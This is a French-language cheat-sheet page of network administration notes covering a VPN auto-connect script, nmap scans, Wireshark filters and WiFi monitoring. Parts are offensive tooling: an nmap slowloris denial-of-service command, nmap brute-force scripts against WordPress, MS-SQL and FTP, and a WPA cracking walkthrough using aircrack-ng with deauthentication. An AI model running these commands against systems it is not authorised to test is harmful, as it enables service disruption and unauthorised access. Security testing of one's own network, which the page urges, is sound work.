===== NetworkManager =====
==== Connecter le VPN automatiquement ====
Pour se faire, il suffit d'ajouter le script ci-dessous à l'emplacement indiqué :
* **/etc/NetworkManager/dispatcher.d/vpn-up**
#! /bin/bash
REQUIRED_CONNECTION_NAME=""
VPN_CONNECTION_NAME=""
default_conn=$(nmcli con show --active | grep "${REQUIRED_CONNECTION_NAME}")
vpn_conn=$(nmcli con show id | grep "${VPN_CONNECTION_NAME}")
if [ "${default_conn}" -a ! "${vpn_conn}" ];
then
nmcli con up id "${VPN_CONNECTION_NAME}"
fi
Il faut ensuite simplement adapter les variables REQUIRED_CONNECTION_NAME et VPN_CONNECTION_NAME, et le tour est joué. Un redémarrage du service NetworkManager, ou un reboot de la machine est nécessaire.
ATTENTION !! ne pas oublier de le rendre exécutable !!
[[https://askubuntu.com/questions/43465/how-to-automatically-connect-to-vpn-with-network-manager|source]]
===== Nmap =====
Dans tous les cas, on peut scanner soit un poste avec son ip, soit un réseau avec la forme 192.168.0.0/24.
==== Scan ====
Pour toutes les commandes ci-dessous on peut aussi faire un export en xml (converti ensuite en html) via la commande suivante :
nmap -sn 192.168.1.0/24 -oX test.xml; xsltproc test.xml -o test.html
=== Lister les hosts en ligne ===
nmap -sn 192.168.1.0/24
Scanne toutes les IP en 192.168.1.*
=== Afficher l'OS (root) ===
sudo nmap -O 192.168.1.51
=== Scan détaillé ===
nmap -A -T4 192.168.1.13
On ajoute **-T4** pour une détection plus rapide (4 Threads)
=== Ports spécifiques (root) ===
On peut spécifier un port spécifique avec **-p [port]**. Sans précision supplémentaire, le port sera scanner sur tous les types de protocole (TCP/UDP/SCTP/IP). On peut sinon spécifier avec les options T: pour TCP, U: pour UDP, S: pour SCTP, ou P: pour IP. On peut aussi les utiliser simultanément, comme ceci :
nmap 192.168.1.0/24 -p U:53,111,137,T:21-25,80,139,8080
=== Scanner sans résolution DNS (gain de temps) ===
Ajouter le commutateur **-n**
=== Détecter les services et leur version ===
nmap -sV 192.168.1.0/24
=== Scanner les ports TCP ===
nmap -sT 192.168.1.0/24
=== Scanner les ports UDP (root) ===
sudo nmap -sU 192.168.1.0/24
==== Techniques ====
=== Détection des CVE/vuln ===
nmap -Pn --script vuln 192.168.1.1
=== DOS (non-root) ===
nmap 192.168.1.1 -max-parallelism 800 -Pn --script http-slowloris --script-args http-slowloris.runforever=true
=== Brute Force ===
WordPress
nmap -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com, http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.1.105
MS-SQL
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt 192.168.1.105
FTP
nmap --script ftp-brute -p 21 192.168.1.105
=== Check malwares ===
Script standard
nmap -sV --script=http-malware-host 192.168.1.105
Script Google
nmap -p80 --script http-google-malware infectedsite.com
[[https://securitytrails.com/blog/top-15-nmap-commands-to-scan-remote-hosts|source]]
===== Wireshark =====
==== Filtres ====
=== Expressions ===
==
!=
<=
>=
<
>
=== Opérateurs ===
^AND|
(ip.src==192.168.2.25) && (ip.dst==74.125.236.16)
|
^OR|
(ip.src==192.168.2.25)||(ip.dst==192.168.2.25)
|
=== Filtres ===
^IP Source|ip.src == 192.168.1.10|
^IP Destination|ip.dst == 192.168.1.1|
^IP (les deux)|ip.addr == 192.168.1.10|
===== IP / Hostnames / DNS =====
==== Hostname à partir de l'IP ====
getent hosts IP
Cela fonctionne aussi bien en LAN que sur des hosts distants.
===== WIFI =====
==== Observer le traffic ====
=== Créer une interface moniteur ===
sudo iw phy phy0 interface add mon0 type monitor
=== Lister les SSID ===
airodump-ng mon0
=== Supprimer une interface moniteur ===
sudo iw mon0 del
==== Tester la sécurité d'un réseau ====
Attention, ceci est à réaliser uniquement sur votre propre réseau, il est strictement interdit par la loi de le faire sur le réseau de quelqu'un d'autre sans son accord préalable et écrit. Vous êtes responsables de vos actes.
Nous utiliserons la populaire suite aircrack.
Le test de sécurité se déroule en 4 étapes principales : créer l'interface moniteur, cibler le réseau, récupérer le “handshake”, trouver le mot de passe.
=== Créer l'interface moniteur ===
sudo airmon-ng # lister les cartes réseau
sudo airmon-ng start wlp3s0 # lancer l'interface moniteur sur la carte wlp3s0 -> wlp3s0mon
=== Cibler le réseau ===
sudo airodump-ng wlp3s0mon # Lister les points d'accès pour en choisir un
sudo airodump-ng --write mon_reseau --bssid 00:11:22:AA:BB:CC -c 1 wlp3s0mon
**–write** spécifie le fichier pour les données récupérées
**–bssid** spécifie l'adresse mac du réseau cible
**-c** pour spécifier le canal du réseau cible
=== Récupérer le handshake ===
Dans un autre terminal, une autre fenêtre ou un autre onglet, saisir ceci pour récupérer le handshake. L'information apparaitra dans le airodump lancé précédemment. Cela peut prendre du temps, 10 secondes comme 15min…
sudo aireplay-ng -0 1 -e mon_reseau -a 00:11:22:AA:BB:CC -h 55:66:77:DD:EE:FF wlp3s0
**-0** spécifie le type d'attaque (1 pour la des-authentification)
**-e** spécifie le nom du réseau
**-a** l'adresse mac du réseau
**-h** l'adresse mac de la carte réseau utilisée
=== Trouver le mot de passe ===
Pour se faire, nous devons utiliser un dictionnaire. Saisir la commande suivante :
sudo aircrack-ng -a 2 -w /dossier/mon_dico.txt ./mon_reseau.cap
**-a** type d'attaque (2 pour WPA)
**-w** chemin du dico (wordlist)
**./mon_reseau.cap** fichier de capture généré par airodump-ng
Cette dernière opération peut prendre des heures, selon la taille du dictionnaire (puisqu'il s'agit d'un brute-force).
Amusez vous bien, et faites pas de bétises ;)
Source https://www.kali-linux.fr/wifi/cracker-cle-wpa